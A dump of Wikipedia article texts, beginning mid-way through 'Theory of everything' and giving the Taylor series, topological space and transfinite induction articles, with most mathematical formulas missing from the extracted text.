individual ribbons and colour as variants of such twisting for fixed electric charge). Bilson-Thompson's original paper suggested that the higher-generation fermions could be represented by more complicated braidings, although explicit constructions of these structures were not given. The electric charge, color, and parity properties of such fermions would arise in the same way as for the first generation. The model was expressly generalized for an infinite number of generations and for the weak force bosons (but not for photons or gluons) in a 2008 paper by Bilson-Thompson, Hackett, Kauffman and Smolin. Other attempts Among other attempts to develop a theory of everything is the theory of causal fermion systems, giving the two current physical theories (general relativity and quantum field theory) as limiting cases. Another theory is called Causal Sets. As some of the approaches mentioned above, its direct goal isn't necessarily to achieve a theory of everything but primarily a working theory of quantum gravity, which might eventually include the standard model and become a candidate for a theory of everything. Its founding principle is that spacetime is fundamentally discrete and that the spacetime events are related by a partial order. This partial order has the physical meaning of the causality relations between relative past and future distinguishing spacetime events. Causal dynamical triangulation does not assume any pre-existing arena (dimensional space), but rather attempts to show how the spacetime fabric itself evolves. Another attempt may be related to ER=EPR, a conjecture in physics stating that entangled particles are connected by a wormhole (or Einstein–Rosen bridge). Present status At present, there is no candidate theory of everything that includes the standard model of particle physics and general relativity and that, at the same time, is able to calculate the fine-structure constant or the mass of the electron. Most particle physicists expect that the outcome of ongoing experiments – the search for new particles at the large particle accelerators and for dark matter – are needed in order to provide further input for a theory of everything. Arguments against In parallel to the intense search for a theory of everything, various scholars have debated the possibility of its discovery. Gödel's incompleteness theorem A number of scholars claim that Gödel's incompleteness theorem suggests that attempts to construct a theory of everything are bound to fail. Gödel's theorem, informally stated, asserts that any formal theory sufficient to express elementary arithmetical facts and strong enough for them to be proved is either inconsistent (both a statement and its denial can be derived from its axioms) or incomplete, in the sense that there is a true statement that can't be derived in the formal theory. Stanley Jaki, in his 1966 book The Relevance of Physics, pointed out that, because a "theory of everything" will certainly be a consistent non-trivial mathematical theory, it must be incomplete. He claims that this dooms searches for a deterministic theory of everything. Freeman Dyson has stated that "Gödel's theorem implies that pure mathematics is inexhaustible. No matter how many problems we solve, there will always be other problems that cannot be solved within the existing rules. […] Because of Gödel's theorem, physics is inexhaustible too. The laws of physics are a finite set of rules, and include the rules for doing mathematics, so that Gödel's theorem applies to them." Stephen Hawking was originally a believer in the Theory of Everything, but after considering Gödel's Theorem, he concluded that one was not obtainable. "Some people will be very disappointed if there is not an ultimate theory that can be formulated as a finite number of principles. I used to belong to that camp, but I have changed my mind." Jürgen Schmidhuber (1997) has argued against this view; he asserts that Gödel's theorems are irrelevant for computable physics. In 2000, Schmidhuber explicitly constructed limit-computable, deterministic universes whose pseudo-randomness based on undecidable, Gödel-like halting problems is extremely hard to detect but does not prevent formal theories of everything describable by very few bits of information. Related critique was offered by Solomon Feferman and others. Douglas S. Robertson offers Conway's game of life as an example: The underlying rules are simple and complete, but there are formally undecidable questions about the game's behaviors. Analogously, it may (or may not) be possible to completely state the underlying rules of physics with a finite number of well-defined laws, but there is little doubt that there are questions about the behavior of physical systems which are formally undecidable on the basis of those underlying laws. Since most physicists would consider the statement of the underlying rules to suffice as the definition of a "theory of everything", most physicists argue that Gödel's Theorem does not mean that a theory of everything cannot exist. On the other hand, the scholars invoking Gödel's Theorem appear, at least in some cases, to be referring not to the underlying rules, but to the understandability of the behavior of all physical systems, as when Hawking mentions arranging blocks into rectangles, turning the computation of prime numbers into a physical question. This definitional discrepancy may explain some of the disagreement among researchers. Fundamental limits in accuracy No physical theory to date is believed to be precisely accurate. Instead, physics has proceeded by a series of "successive approximations" allowing more and more accurate predictions over a wider and wider range of phenomena. Some physicists believe that it is therefore a mistake to confuse theoretical models with the true nature of reality, and hold that the series of approximations will never terminate in the "truth". Einstein himself expressed this view on occasions. Definition of fundamental laws There is a philosophical debate within the physics community as to whether a theory of everything deserves to be called the fundamental law of the universe. One view is the hard reductionist position that the theory of everything is the fundamental law and that all other theories that apply within the universe are a consequence of the theory of everything. Another view is that emergent laws, which govern the behavior of complex systems, should be seen as equally fundamental. Examples of emergent laws are the second law of thermodynamics and the theory of natural selection. The advocates of emergence argue that emergent laws, especially those describing complex or living systems are independent of the low-level, microscopic laws. In this view, emergent laws are as fundamental as a theory of everything. The debates do not make the point at issue clear. Possibly the only issue at stake is the right to apply the high-status term "fundamental" to the respective subjects of research. A well-known debate over this took place between Steven Weinberg and Philip Anderson. Impossibility of calculation Weinberg points out that calculating the precise motion of an actual projectile in the Earth's atmosphere is impossible. So how can we know we have an adequate theory for describing the motion of projectiles? Weinberg suggests that we know principles (Newton's laws of motion and gravitation) that work "well enough" for simple examples, like the motion of planets in empty space. These principles have worked so well on simple examples that we can be reasonably confident they will work for more complex examples. For example, although general relativity includes equations that do not have exact solutions, it is widely accepted as a valid theory because all of its equations with exact solutions have been experimentally verified. Likewise, a theory of everything must work for a wide range of simple examples in such a way that we can be reasonably confident it will work for every situation in physics. Difficulties in creating a theory of everything often begin to appear when combining quantum mechanics with the theory of general relativity, as the equations of quantum mechanics begin to falter when the force of gravity is applied to them.
Physical sciences
Particle physics: General
Physics
30448
https://en.wikipedia.org/wiki/Taylor%20series
Taylor series
In mathematics, the Taylor series or Taylor expansion of a function is an infinite sum of terms that are expressed in terms of the function's derivatives at a single point. For most common functions, the function and the sum of its Taylor series are equal near this point. Taylor series are named after Brook Taylor, who introduced them in 1715. A Taylor series is also called a Maclaurin series when 0 is the point where the derivatives are considered, after Colin Maclaurin, who made extensive use of this special case of Taylor series in the 18th century. The partial sum formed by the first terms of a Taylor series is a polynomial of degree that is called the th Taylor polynomial of the function. Taylor polynomials are approximations of a function, which become generally more accurate as increases. Taylor's theorem gives quantitative estimates on the error introduced by the use of such approximations. If the Taylor series of a function is convergent, its sum is the limit of the infinite sequence of the Taylor polynomials. A function may differ from the sum of its Taylor series, even if its Taylor series is convergent. A function is analytic at a point if it is equal to the sum of its Taylor series in some open interval (or open disk in the complex plane) containing . This implies that the function is analytic at every point of the interval (or disk). Definition The Taylor series of a real or complex-valued function , that is infinitely differentiable at a real or complex number , is the power series Here, denotes the factorial of . The function denotes the th derivative of evaluated at the point . The derivative of order zero of is defined to be itself and and are both defined to be 1. This series can be written by using sigma notation, as in the right side formula. With , the Maclaurin series takes the form: Examples The Taylor series of any polynomial is the polynomial itself. The Maclaurin series of is the geometric series So, by substituting for , the Taylor series of at is By integrating the above Maclaurin series, we find the Maclaurin series of , where denotes the natural logarithm: The corresponding Taylor series of at is and more generally, the corresponding Taylor series of at an arbitrary nonzero point is: The Maclaurin series of the exponential function is The above expansion holds because the derivative of with respect to is also , and equals 1. This leaves the terms in the numerator and in the denominator of each term in the infinite sum. History The ancient Greek philosopher Zeno of Elea considered the problem of summing an infinite series to achieve a finite result, but rejected it as an impossibility; the result was Zeno's paradox. Later, Aristotle proposed a philosophical resolution of the paradox, but the mathematical content was apparently unresolved until taken up by Archimedes, as it had been prior to Aristotle by the Presocratic Atomist Democritus. It was through Archimedes's method of exhaustion that an infinite number of progressive subdivisions could be performed to achieve a finite result. Liu Hui independently employed a similar method a few centuries later. In the 14th century, the earliest examples of specific Taylor series (but not the general method) were given by Indian mathematician Madhava of Sangamagrama. Though no record of his work survives, writings of his followers in the Kerala school of astronomy and mathematics suggest that he found the Taylor series for the trigonometric functions of sine, cosine, and arctangent (see Madhava series). During the following two centuries his followers developed further series expansions and rational approximations. In late 1670, James Gregory was shown in a letter from John Collins several Maclaurin series and derived by Isaac Newton, and told that Newton had developed a general method for expanding functions in series. Newton had in fact used a cumbersome method involving long division of series and term-by-term integration, but Gregory did not know it and set out to discover a general method for himself. In early 1671 Gregory discovered something like the general Maclaurin series and sent a letter to Collins including series for (the integral of (the integral of , the inverse Gudermannian function), and (the Gudermannian function). However, thinking that he had merely redeveloped a method by Newton, Gregory never described how he obtained these series, and it can only be inferred that he understood the general method by examining scratch work he had scribbled on the back of another letter from 1671. In 1691–1692, Isaac Newton wrote down an explicit statement of the Taylor and Maclaurin series in an unpublished version of his work De Quadratura Curvarum. However, this work was never completed and the relevant sections were omitted from the portions published in 1704 under the title Tractatus de Quadratura Curvarum. It was not until 1715 that a general method for constructing these series for all functions for which they exist was finally published by Brook Taylor, after whom the series are now named. The Maclaurin series was named after Colin Maclaurin, a Scottish mathematician, who published a special case of the Taylor result in the mid-18th century. Analytic functions If is given by a convergent power series in an open disk centred at in the complex plane (or an interval in the real line), it is said to be analytic in this region. Thus for in this region, is given by a convergent power series Differentiating by the above formula times, then setting gives: and so the power series expansion agrees with the Taylor series. Thus a function is analytic in an open disk centered at if and only if its Taylor series converges to the value of the function at each point of the disk. If is equal to the sum of its Taylor series for all in the complex plane, it is called entire. The polynomials, exponential function , and the trigonometric functions sine and cosine, are examples of entire functions. Examples of functions that are not entire include the square root, the logarithm, the trigonometric function tangent, and its inverse, arctan. For these functions the Taylor series do not converge if is far from . That is, the Taylor series diverges at if the distance between and is larger than the radius of convergence. The Taylor series can be used to calculate the value of an entire function at every point, if the value of the function, and of all of its derivatives, are known at a single point. Uses of the Taylor series for analytic functions include: The partial sums (the Taylor polynomials) of the series can be used as approximations of the function. These approximations are good if sufficiently many terms are included. Differentiation and integration of power series can be performed term by term and is hence particularly easy. An analytic function is uniquely extended to a holomorphic function on an open disk in the complex plane. This makes the machinery of complex analysis available. The (truncated) series can be used to compute function values numerically, (often by recasting the polynomial into the Chebyshev form and evaluating it with the Clenshaw algorithm). Algebraic operations can be done readily on the power series representation; for instance, Euler's formula follows from Taylor series expansions for trigonometric and exponential functions. This result is of fundamental importance in such fields as harmonic analysis. Approximations using the first few terms of a Taylor series can make otherwise unsolvable problems possible for a restricted domain; this approach is often used in physics. Approximation error and convergence Pictured is an accurate approximation of around the point . The pink curve is a polynomial of degree seven: The error in this approximation is no more than . For a full cycle centered at the origin () the error is less than 0.08215. In particular, for , the error is less than 0.000003. In contrast, also shown is a picture of the natural logarithm function and some of its Taylor polynomials around . These approximations converge to the function only in the region ; outside of this region the higher-degree Taylor polynomials are worse approximations for the function. The error incurred in approximating a function by its th-degree Taylor polynomial is called the remainder or residual and is denoted by the function . Taylor's theorem can be used to obtain a bound on the size of the remainder. In general, Taylor series need not be convergent at all. In fact, the set of functions with a convergent Taylor series is a meager set in the Fréchet space of smooth functions. Even if the Taylor series of a function does converge, its limit need not be equal to the value of the function . For example, the function is infinitely differentiable at , and has all derivatives zero there. Consequently, the Taylor series of about is identically zero. However, is not the zero function, so does not equal its Taylor series around the origin. Thus, is an example of a non-analytic smooth function. In real analysis, this example shows that there are infinitely differentiable functions whose Taylor series are not equal to even if they converge. By contrast, the holomorphic functions studied in complex analysis always possess a convergent Taylor series, and even the Taylor series of meromorphic functions, which might have singularities, never converge to a value different from the function itself. The complex function , however, does not approach 0 when approaches 0 along the imaginary axis, so it is not continuous in the complex plane and its Taylor series is undefined at 0. More generally, every sequence of real or complex numbers can appear as coefficients in the Taylor series of an infinitely differentiable function defined on the real line, a consequence of Borel's lemma. As a result, the radius of convergence of a Taylor series can be zero. There are even infinitely differentiable functions defined on the real line whose Taylor series have a radius of convergence 0 everywhere. A function cannot be written as a Taylor series centred at a singularity; in these cases, one can often still achieve a series expansion if one allows also negative powers of the variable ; see Laurent series. For example, can be written as a Laurent series. Generalization The generalization of the Taylor series does converge to the value of the function itself for any bounded continuous function on , and this can be done by using the calculus of finite differences. Specifically, the following theorem, due to Einar Hille, that for any , Here is the th finite difference operator with step size . The series is precisely the Taylor series, except that divided differences appear in place of differentiation: the series is formally similar to the Newton series. When the function is analytic at , the terms in the series converge to the terms of the Taylor series, and in this sense generalizes the usual Taylor series. In general, for any infinite sequence , the following power series identity holds: So in particular, The series on the right is the expected value of , where is a Poisson-distributed random variable that takes the value with probability . Hence, The law of large numbers implies that the identity holds. List of Maclaurin series of some common functions Several important Maclaurin series expansions follow. All these expansions are valid for complex arguments . Exponential function The exponential function (with base ) has Maclaurin series It converges for all . The exponential generating function of the Bell numbers is the exponential function of the predecessor of the exponential function: Natural logarithm The natural logarithm (with base ) has Maclaurin series The last series is known as Mercator series, named after Nicholas Mercator (since it was published in his 1668 treatise Logarithmotechnia). Both of these series converge for . (In addition, the series for converges for , and the series for converges for .) Geometric series The geometric series and its derivatives have Maclaurin series All are convergent for . These are special cases of the binomial series given in the next section. Binomial series The binomial series is the power series whose coefficients are the generalized binomial coefficients (If , this product is an empty product and has value 1.) It converges for for any real or complex number . When , this is essentially the infinite geometric series mentioned in the previous section. The special cases and give the square root function and its inverse: When only the linear term is retained, this simplifies to the binomial approximation. Trigonometric functions The usual trigonometric functions and their inverses have the following Maclaurin series: All angles are expressed in radians. The numbers appearing in the expansions of are the Bernoulli numbers. The in the expansion of are Euler numbers. Hyperbolic functions The hyperbolic functions have Maclaurin series closely related to the series for the corresponding trigonometric functions: The numbers appearing in the series for are the Bernoulli numbers. Polylogarithmic functions The polylogarithms have these defining identities: The Legendre chi functions are defined as follows: And the formulas presented below are called inverse tangent integrals: In statistical thermodynamics these formulas are of great importance. Elliptic functions The complete elliptic integrals of first kind K and of second kind E can be defined as follows: The Jacobi theta functions describe the world of the elliptic modular functions and they have these Taylor series: The regular partition number sequence P(n) has this generating function: The strict partition number sequence Q(n) has that generating function: Calculation of Taylor series Several methods exist for the calculation of Taylor series of a large number of functions. One can attempt to use the definition of the Taylor series, though this often requires generalizing the form of the coefficients according to a readily apparent pattern. Alternatively, one can use manipulations such as substitution, multiplication or division, addition or subtraction of standard Taylor series to construct the Taylor series of a function, by virtue of Taylor series being power series. In some cases, one can also derive the Taylor series by repeatedly applying integration by parts. Particularly convenient is the use of computer algebra systems to calculate Taylor series. First example In order to compute the 7th degree Maclaurin polynomial for the function one may first rewrite the function as the composition of two functions and The Taylor series for the natural logarithm is (using big O notation) and for the cosine function The first several terms from the second series can be substituted into each term of the first series. Because the first term in the second series has degree 2, three terms of the first series suffice to give a 7th-degree polynomial: Since the cosine is an even function, the coefficients for all the odd powers are zero. Second example Suppose we want the Taylor series at 0 of the function The Taylor series for the exponential function is and the series for cosine is Assume the series for their quotient is Multiplying both sides by the denominator and then expanding it as a series yields Comparing the coefficients of with the coefficients of The coefficients of the series for can thus be computed one at a time, amounting to long division of the series for and Third example Here we employ a method called "indirect expansion" to expand the given function. This method uses the known Taylor expansion of the exponential function. In order to expand as a Taylor series in , we use the known Taylor series of function : Thus, Taylor series as definitions Classically, algebraic functions are defined by an algebraic equation, and transcendental functions (including those discussed above) are defined by some property that holds for them, such as a differential equation. For example, the exponential function is the function which is equal to its own derivative everywhere, and assumes the value 1 at the origin. However, one may equally well define an analytic function by its Taylor series. Taylor series are used to define functions and "operators" in diverse areas of mathematics. In particular, this is true in areas where the classical definitions of functions break down. For example, using Taylor series, one may extend analytic functions to sets of matrices and operators, such as the matrix exponential or matrix logarithm. In other areas, such as formal analysis, it is more convenient to work directly with the power series themselves. Thus one may define a solution of a differential equation as a power series which, one hopes to prove, is the Taylor series of the desired solution. Taylor series in several variables The Taylor series may also be generalized to functions of more than one variable with For example, for a function that depends on two variables, and , the Taylor series to second order about the point is where the subscripts denote the respective partial derivatives. Second-order Taylor series in several variables A second-order Taylor series expansion of a scalar-valued function of more than one variable can be written compactly as where is the gradient of evaluated at and is the Hessian matrix. Applying the multi-index notation the Taylor series for several variables becomes which is to be understood as a still more abbreviated multi-index version of the first equation of this paragraph, with a full analogy to the single variable case. Example In order to compute a second-order Taylor series expansion around point of the function one first computes all the necessary partial derivatives: Evaluating these derivatives at the origin gives the Taylor coefficients Substituting these values in to the general formula produces Since is analytic in , we have Comparison with Fourier series The trigonometric Fourier series enables one to express a periodic function (or a function defined on a closed interval ) as an infinite sum of trigonometric functions (sines and cosines). In this sense, the Fourier series is analogous to Taylor series, since the latter allows one to express a function as an infinite sum of powers. Nevertheless, the two series differ from each other in several relevant issues: The finite truncations of the Taylor series of about the point are all exactly equal to at . In contrast, the Fourier series is computed by integrating over an entire interval, so there is generally no such point where all the finite truncations of the series are exact. The computation of Taylor series requires the knowledge of the function on an arbitrary small neighbourhood of a point, whereas the computation of the Fourier series requires knowing the function on its whole domain interval. In a certain sense one could say that the Taylor series is "local" and the Fourier series is "global". The Taylor series is defined for a function which has infinitely many derivatives at a single point, whereas the Fourier series is defined for any integrable function. In particular, the function could be nowhere differentiable. (For example, could be a Weierstrass function.) The convergence of both series has very different properties. Even if the Taylor series has positive convergence radius, the resulting series may not coincide with the function; but if the function is analytic then the series converges pointwise to the function, and uniformly on every compact subset of the convergence interval. Concerning the Fourier series, if the function is square-integrable then the series converges in quadratic mean, but additional requirements are needed to ensure the pointwise or uniform convergence (for instance, if the function is periodic and of class C1 then the convergence is uniform). Finally, in practice one wants to approximate the function with a finite number of terms, say with a Taylor polynomial or a partial sum of the trigonometric series, respectively. In the case of the Taylor series the error is very small in a neighbourhood of the point where it is computed, while it may be very large at a distant point. In the case of the Fourier series the error is distributed along the domain of the function.
Mathematics
Calculus and analysis
null
30450
https://en.wikipedia.org/wiki/Topological%20space
Topological space
In mathematics, a topological space is, roughly speaking, a geometrical space in which closeness is defined but cannot necessarily be measured by a numeric distance. More specifically, a topological space is a set whose elements are called points, along with an additional structure called a topology, which can be defined as a set of neighbourhoods for each point that satisfy some axioms formalizing the concept of closeness. There are several equivalent definitions of a topology, the most commonly used of which is the definition through open sets, which is easier than the others to manipulate. A topological space is the most general type of a mathematical space that allows for the definition of limits, continuity, and connectedness. Common types of topological spaces include Euclidean spaces, metric spaces and manifolds. Although very general, the concept of topological spaces is fundamental, and used in virtually every branch of modern mathematics. The study of topological spaces in their own right is called point-set topology or general topology. History Around 1735, Leonhard Euler discovered the formula relating the number of vertices (V), edges (E) and faces (F) of a convex polyhedron, and hence of a planar graph. The study and generalization of this formula, specifically by Cauchy (1789–1857) and L'Huilier (1750–1840), boosted the study of topology. In 1827, Carl Friedrich Gauss published General investigations of curved surfaces, which in section 3 defines the curved surface in a similar manner to the modern topological understanding: "A curved surface is said to possess continuous curvature at one of its points A, if the direction of all the straight lines drawn from A to points of the surface at an infinitesimal distance from A are deflected infinitesimally from one and the same plane passing through A." Yet, "until Riemann's work in the early 1850s, surfaces were always dealt with from a local point of view (as parametric surfaces) and topological issues were never considered". " Möbius and Jordan seem to be the first to realize that the main problem about the topology of (compact) surfaces is to find invariants (preferably numerical) to decide the equivalence of surfaces, that is, to decide whether two surfaces are homeomorphic or not." The subject is clearly defined by Felix Klein in his "Erlangen Program" (1872): the geometry invariants of arbitrary continuous transformation, a kind of geometry. The term "topology" was introduced by Johann Benedict Listing in 1847, although he had used the term in correspondence some years earlier instead of previously used "Analysis situs". The foundation of this science, for a space of any dimension, was created by Henri Poincaré. His first article on this topic appeared in 1894. In the 1930s, James Waddell Alexander II and Hassler Whitney first expressed the idea that a surface is a topological space that is locally like a Euclidean plane. Topological spaces were first defined by Felix Hausdorff in 1914 in his seminal "Principles of Set Theory". Metric spaces had been defined earlier in 1906 by Maurice Fréchet, though it was Hausdorff who popularised the term "metric space" (). Definitions The utility of the concept of a topology is shown by the fact that there are several equivalent definitions of this mathematical structure. Thus one chooses the axiomatization suited for the application. The most commonly used is that in terms of , but perhaps more intuitive is that in terms of and so this is given first. Definition via neighbourhoods This axiomatization is due to Felix Hausdorff. Let be a (possibly empty) set. The elements of are usually called , though they can be any mathematical object. Let be a function assigning to each (point) in a non-empty collection of subsets of The elements of will be called of with respect to (or, simply, ). The function is called a neighbourhood topology if the axioms below are satisfied; and then with is called a topological space. If is a neighbourhood of (i.e., ), then In other words, each point of the set belongs to every one of its neighbourhoods with respect to . If is a subset of and includes a neighbourhood of then is a neighbourhood of I.e., every superset of a neighbourhood of a point is again a neighbourhood of The intersection of two neighbourhoods of is a neighbourhood of Any neighbourhood of includes a neighbourhood of such that is a neighbourhood of each point of The first three axioms for neighbourhoods have a clear meaning. The fourth axiom has a very important use in the structure of the theory, that of linking together the neighbourhoods of different points of A standard example of such a system of neighbourhoods is for the real line where a subset of is defined to be a of a real number if it includes an open interval containing Given such a structure, a subset of is defined to be open if is a neighbourhood of all points in The open sets then satisfy the axioms given below in the next definition of a topological space. Conversely, when given the open sets of a topological space, the neighbourhoods satisfying the above axioms can be recovered by defining to be a neighbourhood of if includes an open set such that Definition via open sets A topology on a set may be defined as a collection of subsets of , called open sets and satisfying the following axioms: The empty set and itself belong to Any arbitrary (finite or infinite) union of members of belongs to The intersection of any finite number of members of belongs to As this definition of a topology is the most commonly used, the set of the open sets is commonly called a topology on A subset is said to be in if its complement is an open set. Examples of topologies Given the trivial or topology on is the family consisting of only the two subsets of required by the axioms forms a topology on Given the family of six subsets of forms another topology of Given the discrete topology on is the power set of which is the family consisting of all possible subsets of In this case the topological space is called a discrete space. Given the set of integers, the family of all finite subsets of the integers plus itself is a topology, because (for example) the union of all finite sets not containing zero is not finite and therefore not a member of the family of finite sets. The union of all finite sets not containing zero is also not all of and so it cannot be in Definition via closed sets Using de Morgan's laws, the above axioms defining open sets become axioms defining closed sets: The empty set and are closed. The intersection of any collection of closed sets is also closed. The union of any finite number of closed sets is also closed. Using these axioms, another way to define a topological space is as a set together with a collection of closed subsets of Thus the sets in the topology are the closed sets, and their complements in are the open sets. Other definitions There are many other equivalent ways to define a topological space: in other words the concepts of neighbourhood, or that of open or closed sets can be reconstructed from other starting points and satisfy the correct axioms. Another way to define a topological space is by using the Kuratowski closure axioms, which define the closed sets as the fixed points of an operator on the power set of A net is a generalisation of the concept of sequence. A topology is completely determined if for every net in the set of its accumulation points is specified. Comparison of topologies Many topologies can be defined on a set to form a topological space. When every open set of a topology is also open for a topology one says that is than and is than A proof that relies only on the existence of certain open sets will also hold for any finer topology, and similarly a proof that relies only on certain sets not being open applies to any coarser topology. The terms and are sometimes used in place of finer and coarser, respectively. The terms and are also used in the literature, but with little agreement on the meaning, so one should always be sure of an author's convention when reading. The collection of all topologies on a given fixed set forms a complete lattice: if is a collection of topologies on then the meet of is the intersection of and the join of is the meet of the collection of all topologies on that contain every member of Continuous functions A function between topological spaces is called continuous if for every and every neighbourhood of there is a neighbourhood of such that This relates easily to the usual definition in analysis. Equivalently, is continuous if the inverse image of every open set is open. This is an attempt to capture the intuition that there are no "jumps" or "separations" in the function. A homeomorphism is a bijection that is continuous and whose inverse is also continuous. Two spaces are called if there exists a homeomorphism between them. From the standpoint of topology, homeomorphic spaces are essentially identical. In category theory, one of the fundamental categories is Top, which denotes the category of topological spaces whose objects are topological spaces and whose morphisms are continuous functions. The attempt to classify the objects of this category (up to homeomorphism) by invariants has motivated areas of research, such as homotopy theory, homology theory, and K-theory. Examples of topological spaces A given set may have many different topologies. If a set is given a different topology, it is viewed as a different topological space. Any set can be given the discrete topology in which every subset is open. The only convergent sequences or nets in this topology are those that are eventually constant. Also, any set can be given the trivial topology (also called the indiscrete topology), in which only the empty set and the whole space are open. Every sequence and net in this topology converges to every point of the space. This example shows that in general topological spaces, limits of sequences need not be unique. However, often topological spaces must be Hausdorff spaces where limit points are unique. There exist numerous topologies on any given finite set. Such spaces are called finite topological spaces. Finite spaces are sometimes used to provide examples or counterexamples to conjectures about topological spaces in general. Any set can be given the cofinite topology in which the open sets are the empty set and the sets whose complement is finite. This is the smallest T1 topology on any infinite set. Any set can be given the cocountable topology, in which a set is defined as open if it is either empty or its complement is countable. When the set is uncountable, this topology serves as a counterexample in many situations. The real line can also be given the lower limit topology. Here, the basic open sets are the half open intervals This topology on is strictly finer than the Euclidean topology defined above; a sequence converges to a point in this topology if and only if it converges from above in the Euclidean topology. This example shows that a set may have many distinct topologies defined on it. If is an ordinal number, then the set may be endowed with the order topology generated by the intervals and where and are elements of Every manifold has a natural topology since it is locally Euclidean. Similarly, every simplex and every simplicial complex inherits a natural topology from . The Sierpiński space is the simplest non-discrete topological space. It has important relations to the theory of computation and semantics. Topology from other topologies Every subset of a topological space can be given the subspace topology in which the open sets are the intersections of the open sets of the larger space with the subset. For any indexed family of topological spaces, the product can be given the product topology, which is generated by the inverse images of open sets of the factors under the projection mappings. For example, in finite products, a basis for the product topology consists of all products of open sets. For infinite products, there is the additional requirement that in a basic open set, all but finitely many of its projections are the entire space. A quotient space is defined as follows: if is a topological space and is a set, and if is a surjective function, then the quotient topology on is the collection of subsets of that have open inverse images under In other words, the quotient topology is the finest topology on for which is continuous. A common example of a quotient topology is when an equivalence relation is defined on the topological space The map is then the natural projection onto the set of equivalence classes. The Vietoris topology on the set of all non-empty subsets of a topological space named for Leopold Vietoris, is generated by the following basis: for every -tuple of open sets in we construct a basis set consisting of all subsets of the union of the that have non-empty intersections with each The Fell topology on the set of all non-empty closed subsets of a locally compact Polish space is a variant of the Vietoris topology, and is named after mathematician James Fell. It is generated by the following basis: for every -tuple of open sets in and for every compact set the set of all subsets of that are disjoint from and have nonempty intersections with each is a member of the basis. Metric spaces Metric spaces embody a metric, a precise notion of distance between points. Every metric space can be given a metric topology, in which the basic open sets are open balls defined by the metric. This is the standard topology on any normed vector space. On a finite-dimensional vector space this topology is the same for all norms. There are many ways of defining a topology on the set of real numbers. The standard topology on is generated by the open intervals. The set of all open intervals forms a base or basis for the topology, meaning that every open set is a union of some collection of sets from the base. In particular, this means that a set is open if there exists an open interval of non zero radius about every point in the set. More generally, the Euclidean spaces can be given a topology. In the usual topology on the basic open sets are the open balls. Similarly, the set of complex numbers, and have a standard topology in which the basic open sets are open balls. Topology from algebraic structure For any algebraic objects we can introduce the discrete topology, under which the algebraic operations are continuous functions. For any such structure that is not finite, we often have a natural topology compatible with the algebraic operations, in the sense that the algebraic operations are still continuous. This leads to concepts such as topological groups, topological vector spaces, topological rings and local fields. Any local field has a topology native to it, and this can be extended to vector spaces over that field. The Zariski topology is defined algebraically on the spectrum of a ring or an algebraic variety. On or the closed sets of the Zariski topology are the solution sets of systems of polynomial equations. Topological spaces with order structure Spectral: A space is spectral if and only if it is the prime spectrum of a ring (Hochster theorem). Specialization preorder: In a space the specialization preorder (or canonical preorder) is defined by if and only if where denotes an operator satisfying the Kuratowski closure axioms. Topology from other structure If is a filter on a set then is a topology on Many sets of linear operators in functional analysis are endowed with topologies that are defined by specifying when a particular sequence of functions converges to the zero function. A linear graph has a natural topology that generalizes many of the geometric aspects of graphs with vertices and edges. Outer space of a free group consists of the so-called "marked metric graph structures" of volume 1 on Classification of topological spaces Topological spaces can be broadly classified, up to homeomorphism, by their topological properties. A topological property is a property of spaces that is invariant under homeomorphisms. To prove that two spaces are not homeomorphic it is sufficient to find a topological property not shared by them. Examples of such properties include connectedness, compactness, and various separation axioms. For algebraic invariants see algebraic topology.
Mathematics
Geometry
null
30461
https://en.wikipedia.org/wiki/Transfinite%20induction
Transfinite induction
Transfinite induction is an extension of mathematical induction to well-ordered sets, for example to sets of ordinal numbers or cardinal numbers. Its correctness is a theorem of ZFC. Induction by cases Let be a property defined for all ordinals . Suppose that whenever is true for all , then is also true. Then transfinite induction tells us that is true for all ordinals. Usually the proof is broken down into three cases: Zero case: Prove that is true. Successor case: Prove that for any successor ordinal , follows from (and, if necessary, for all ). Limit case: Prove that for any limit ordinal , if holds for all , then . All three cases are identical except for the type of ordinal considered. They do not formally need to be considered separately, but in practice the proofs are typically so different as to require separate presentations. Zero is sometimes considered a limit ordinal and then may sometimes be treated in proofs in the same case as limit ordinals. Transfinite recursion Transfinite recursion is similar to transfinite induction; however, instead of proving that something holds for all ordinal numbers, we construct a sequence of objects, one for each ordinal. As an example, a basis for a (possibly infinite-dimensional) vector space can be created by starting with the empty set and for each ordinal α > 0 choosing a vector that is not in the span of the vectors . This process stops when no vector can be chosen. More formally, we can state the Transfinite Recursion Theorem as follows: Transfinite Recursion Theorem (version 1). Given a class function G: V → V (where V is the class of all sets), there exists a unique transfinite sequence F: Ord → V (where Ord is the class of all ordinals) such that for all ordinals α, where denotes the restriction of Fs domain to ordinals <α. As in the case of induction, we may treat different types of ordinals separately: another formulation of transfinite recursion is the following:Transfinite Recursion Theorem (version 2)'''. Given a set g1, and class functions G2, G3, there exists a unique function F: Ord → V such that F(0) = g1, F(α + 1) = G2(F(α)), for all α ∈ Ord, , for all limit λ ≠ 0. Note that we require the domains of G2, G3 to be broad enough to make the above properties meaningful. The uniqueness of the sequence satisfying these properties can be proved using transfinite induction. More generally, one can define objects by transfinite recursion on any well-founded relation R. (R need not even be a set; it can be a proper class, provided it is a set-like relation; i.e. for any x, the collection of all y such that yRx is a set.) Relationship to the axiom of choice Proofs or constructions using induction and recursion often use the axiom of choice to produce a well-ordered relation that can be treated by transfinite induction. However, if the relation in question is already well-ordered, one can often use transfinite induction without invoking the axiom of choice. For example, many results about Borel sets are proved by transfinite induction on the ordinal rank of the set; these ranks are already well-ordered, so the axiom of choice is not needed to well-order them. The following construction of the Vitali set shows one way that the axiom of choice can be used in a proof by transfinite induction: First, well-order the real numbers (this is where the axiom of choice enters via the well-ordering theorem), giving a sequence , where β is an ordinal with the cardinality of the continuum. Let v0 equal r0. Then let v1 equal rα1, where α1 is least such that rα1 − v0 is not a rational number. Continue; at each step use the least real from the r sequence that does not have a rational difference with any element thus far constructed in the v sequence. Continue until all the reals in the r sequence are exhausted. The final v sequence will enumerate the Vitali set. The above argument uses the axiom of choice in an essential way at the very beginning, in order to well-order the reals. After that step, the axiom of choice is not used again. Other uses of the axiom of choice are more subtle. For example, a construction by transfinite recursion frequently will not specify a unique value for Aα+1, given the sequence up to α, but will specify only a condition that A''α+1 must satisfy, and argue that there is at least one set satisfying this condition. If it is not possible to define a unique example of such a set at each stage, then it may be necessary to invoke (some form of) the axiom of choice to select one such at each step. For inductions and recursions of countable length, the weaker axiom of dependent choice is sufficient. Because there are models of Zermelo–Fraenkel set theory of interest to set theorists that satisfy the axiom of dependent choice but not the full axiom of choice, the knowledge that a particular proof only requires dependent choice can be useful.
Mathematics
Set theory
null
30462
https://en.wikipedia.org/wiki/Triple%20point
Triple point
